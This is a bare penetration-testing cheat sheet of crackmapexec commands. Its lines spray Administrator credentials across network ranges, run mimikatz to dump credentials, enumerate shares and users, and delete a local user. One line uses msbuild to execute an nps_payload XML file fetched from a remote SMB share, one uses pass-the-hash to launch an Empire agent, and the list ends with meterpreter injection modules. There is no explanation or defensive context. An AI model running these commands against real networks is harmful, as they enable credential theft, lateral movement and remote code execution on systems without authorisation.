crackmapexec X.X.0.0/16 -t 100 -u Administrator -p 'XXXXXX' -d WORKGROUP

crackmapexec X.X.X.139 -t 100 -u Administrator -p 'XxxxX' -d WORKGROUP --shares --users --mssql

crackmapexec X.X.X.139 -t 100 -u Administrator -p 'XxxxX' -d WORKGROUP -M mimikatz -o COMMAND=privilege::debug

crackmapexec X.X.X.X -t 100 -u Administrator -p 'XxxxX' -d WORKGROUP --lusers --shares

crackmapexec ip_new.txt -t 100 -u Administrator -p 'XXXXXX' -d WORKGROUP

crackmapexec smb 192.168.137.1 -u username -p password -x '%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\192.168.137.133\Guest\msbuild_nps.xml'

git clone https://github.com/trustedsec/nps_payload.git

=== NEW ===
SMB
----

crackmapexec 1.2.3.4 -d DOMAIN -u domainadmin -p password -x 'net user newlocaluser /del'

crackmapexec smb IPs.txt -u User -H 33445678902bbbe760ea1f1234567890 -M empire_exec -o LISTENER=CME

crackmapexe 10.10.10.10 -u dude -p /home/passfile.txt

MYSQL
-----

crackmapexec mssql -d . -u user -p pass -q 'select @@Version'

MODULE
------

com_exec -> mimikatz
com_exec -> meterpreter_inject
